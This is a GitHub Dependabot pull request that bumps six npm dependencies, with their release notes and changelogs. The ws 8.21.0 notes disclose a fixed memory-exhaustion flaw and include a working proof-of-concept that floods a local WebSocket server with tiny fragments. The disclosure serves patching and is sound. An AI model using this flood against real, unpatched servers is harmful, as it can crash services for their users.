Skip to content

chore(deps)(deps): bump the npm-production group across 1 directory with 6 updates#1033

Open
dependabot[bot] wants to merge 1 commit into
developfrom
dependabot/npm_and_yarn/npm-production-c34cfabfda
Open

chore(deps)(deps): bump the npm-production group across 1 directory with 6 updates#1033
dependabot[bot] wants to merge 1 commit into
developfrom
dependabot/npm_and_yarn/npm-production-c34cfabfda

Conversation

@dependabot
Copy link
Copy Markdown
Contributor

@dependabot dependabot Bot commented on behalf of github May 29, 2026

Bumps the npm-production group with 6 updates in the / directory:

Package From To
lucide-react 0.460.0 0.577.0
ws 8.20.1 8.21.0
web-vitals 5.2.0 5.3.0
@module-federation/rsbuild-plugin 0.9.1 0.24.1
@module-federation/runtime 0.9.1 0.24.1
shaders 2.5.109 2.5.128

Updates lucide-react from 0.460.0 to 0.577.0

Release notes

Sourced from lucide-react's releases.

Version 0.577.0

What's Changed

New Contributors

Full Changelog: lucide-icons/lucide@0.576.0...0.577.0

Version 0.576.0

What's Changed

Full Changelog: lucide-icons/lucide@0.575.0...0.576.0

Version 0.575.0

What's Changed

New Contributors

Full Changelog: lucide-icons/lucide@0.573.0...0.575.0

Version 0.574.0

What's Changed

New Contributors

... (truncated)

Commits
  • f6c0d06 chore(deps): bump rollup from 4.53.3 to 4.59.0 (#4106)
  • 67c0485 feat(scripts): added helper script to automatically update OpenCollective bac...
  • b6ed43d feat(packages): Added aria-hidden fallback for decorative icons to all packag...
  • 076e0bb chore(dependencies): Update dependencies (#3809)
  • 80d6f73 fix(icons): Rename fingerprint icon to fingerprint-pattern (#3767)
  • 1cfb3ff chore(deps-dev): bump vite from 6.3.5 to 6.3.6 (#3611)
  • e71198d chore: icon alias improvements (#2861)
  • 3e644fd chore(scripts): Refactor scripts to typescript (#3316)
  • 19fa01b build(deps-dev): bump vite from 6.3.2 to 6.3.4 (#3181)
  • 03eb862 use implicit return in react package (#2325)
  • Additional commits viewable in compare view
Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for lucide-react since your current version.


Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

Updates web-vitals from 5.2.0 to 5.3.0

Changelog

Sourced from web-vitals's changelog.

v5.3.0 (2026-05-28)

  • Remove getFirstHiddenTimePolyfill (#729)
  • Fixed issue where the same configuration object to multiple metric functions can result in errors (#731)
  • Add more robust interactionTarget setting for INP (#744)
Commits

Updates @module-federation/rsbuild-plugin from 0.9.1 to 0.24.1

Release notes

Sourced from @​module-federation/rsbuild-plugin's releases.

0.24.1

What's Changed

Bug Fixes 🐞

Document 📖

Full Changelog: module-federation/core@v0.24.0...v0.24.1

Release v0.24.0

What's Changed

New Features 🎉

Bug Fixes 🐞

Document 📖

Other Changes

Full Changelog: module-federation/core@v0.23.0...v0.24.0

0.23.0

What's Changed

New Features 🎉

Bug Fixes 🐞

... (truncated)

Changelog

Sourced from @​module-federation/rsbuild-plugin's changelog.

0.24.1

Patch Changes

  • @​module-federation/node@​2.7.30
  • @​module-federation/enhanced@​0.24.1
  • @​module-federation/sdk@​0.24.1

0.24.0

Patch Changes

  • Updated dependencies [c3c068e]
    • @​module-federation/enhanced@​0.24.0
    • @​module-federation/node@​2.7.29
    • @​module-federation/sdk@​0.24.0

0.23.0

Minor Changes

  • 3aa3cf9: feat(rsbuild-plugin): support build node mf assets

Patch Changes

  • @​module-federation/enhanced@​0.23.0
  • @​module-federation/node@​2.7.28
  • @​module-federation/sdk@​0.23.0

0.22.1

Patch Changes

  • @​module-federation/enhanced@​0.22.1
  • @​module-federation/sdk@​0.22.1
  • @​module-federation/node@​2.7.27

0.22.0

Patch Changes

  • @​module-federation/enhanced@​0.22.0
  • @​module-federation/sdk@​0.22.0
  • @​module-federation/node@​2.7.26

0.21.6

Patch Changes

  • b307ae0: fix(rsbuild-plugin): create different temp filepath to prevent invalid manifest.exposes

... (truncated)

Commits
Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for @​module-federation/rsbuild-plugin since your current version.


Updates @module-federation/runtime from 0.9.1 to 0.24.1

Release notes

Sourced from @​module-federation/runtime's releases.

0.24.1

What's Changed

Bug Fixes 🐞

Document 📖

Full Changelog: module-federation/core@v0.24.0...v0.24.1

Release v0.24.0

What's Changed

New Features 🎉

Bug Fixes 🐞

Document 📖

Other Changes

Full Changelog: module-federation/core@v0.23.0...v0.24.0

0.23.0

What's Changed

New Features 🎉

Bug Fixes 🐞

... (truncated)

Changelog

Sourced from @​module-federation/runtime's changelog.

0.24.1

Patch Changes

  • Updated dependencies [6590738]
    • @​module-federation/runtime-core@​0.24.1
    • @​module-federation/sdk@​0.24.1
    • @​module-federation/error-codes@​0.24.1

0.24.0

Patch Changes

  • @​module-federation/sdk@​0.24.0
  • @​module-federation/error-codes@​0.24.0
  • @​module-federation/runtime-core@​0.24.0

0.23.0

Patch Changes

  • Updated dependencies [3aa3cf9]
    • @​module-federation/runtime-core@​0.23.0
    • @​module-federation/sdk@​0.23.0
    • @​module-federation/error-codes@​0.23.0

0.22.1

Patch Changes

  • @​module-federation/sdk@​0.22.1
  • @​module-federation/error-codes@​0.22.1
  • @​module-federation/runtime-core@​0.22.1

0.22.0

Patch Changes

  • @​module-federation/sdk@​0.22.0
  • @​module-federation/error-codes@​0.22.0
  • @​module-federation/runtime-core@​0.22.0

0.21.6

Patch Changes

  • @​module-federation/sdk@​0.21.6
  • @​module-federation/error-codes@​0.21.6
  • @​module-federation/runtime-core@​0.21.6

... (truncated)

Commits
Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for @​module-federation/runtime since your current version.


Updates shaders from 2.5.109 to 2.5.128

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions

@dependabot
chore(deps)(deps): bump the npm-production group across 1 directory w…
b166628 
…ith 6 updates

Bumps the npm-production group with 6 updates in the / directory:

| Package | From | To |
| --- | --- | --- |
| [lucide-react](https://github.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react) | `0.460.0` | `0.577.0` |
| [ws](https://github.com/websockets/ws) | `8.20.1` | `8.21.0` |
| [web-vitals](https://github.com/GoogleChrome/web-vitals) | `5.2.0` | `5.3.0` |
| [@module-federation/rsbuild-plugin](https://github.com/module-federation/core/tree/HEAD/packages/rsbuild-plugin) | `0.9.1` | `0.24.1` |
| [@module-federation/runtime](https://github.com/module-federation/core/tree/HEAD/packages/runtime) | `0.9.1` | `0.24.1` |
| [shaders](https://shaders.com/) | `2.5.109` | `2.5.128` |



Updates `lucide-react` from 0.460.0 to 0.577.0
- [Release notes](https://github.com/lucide-icons/lucide/releases)
- [Commits](https://github.com/lucide-icons/lucide/commits/0.577.0/packages/lucide-react)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

Updates `web-vitals` from 5.2.0 to 5.3.0
- [Changelog](https://github.com/GoogleChrome/web-vitals/blob/main/CHANGELOG.md)
- [Commits](GoogleChrome/web-vitals@v5.2.0...v5.3.0)

Updates `@module-federation/rsbuild-plugin` from 0.9.1 to 0.24.1
- [Release notes](https://github.com/module-federation/core/releases)
- [Changelog](https://github.com/module-federation/core/blob/main/packages/rsbuild-plugin/CHANGELOG.md)
- [Commits](https://github.com/module-federation/core/commits/v0.24.1/packages/rsbuild-plugin)

Updates `@module-federation/runtime` from 0.9.1 to 0.24.1
- [Release notes](https://github.com/module-federation/core/releases)
- [Changelog](https://github.com/module-federation/core/blob/main/packages/runtime/CHANGELOG.md)
- [Commits](https://github.com/module-federation/core/commits/v0.24.1/packages/runtime)

Updates `shaders` from 2.5.109 to 2.5.128

---
updated-dependencies:
- dependency-name: lucide-react
  dependency-version: 0.577.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
  dependency-group: npm-production
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
  dependency-group: npm-production
- dependency-name: web-vitals
  dependency-version: 5.3.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
  dependency-group: npm-production
- dependency-name: "@module-federation/rsbuild-plugin"
  dependency-version: 0.24.1
  dependency-type: direct:production
  update-type: version-update:semver-minor
  dependency-group: npm-production
- dependency-name: "@module-federation/runtime"
  dependency-version: 0.24.1
  dependency-type: direct:production
  update-type: version-update:semver-minor
  dependency-group: npm-production
- dependency-name: shaders
  dependency-version: 2.5.128
  dependency-type: direct:production
  update-type: version-update:semver-patch
  dependency-group: npm-production
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot Bot added area: deps Dependency updates (Dependabot, supply chain) dependencies Pull requests that update a dependency file labels May 29, 2026
@dependabot dependabot Bot added dependencies Pull requests that update a dependency file area: deps Dependency updates (Dependabot, supply chain) labels May 29, 2026
@github-actions
Copy link
Copy Markdown

github-actions Bot commented May 29, 2026

No description provided.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@jmaionchi jmaionchi Awaiting requested review from jmaionchi jmaionchi is a code owner

@Rod-Christensen Rod-Christensen Awaiting requested review from Rod-Christensen Rod-Christensen is a code owner

@stepmikhaylov stepmikhaylov Awaiting requested review from stepmikhaylov stepmikhaylov is a code owner

At least 1 approving review is required to merge this pull request.

Assignees

No one assigned

Labels

area: deps Dependency updates (Dependabot, supply chain) dependencies Pull requests that update a dependency file module:client-typescript module:ui Chat UI and Dropper UI

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants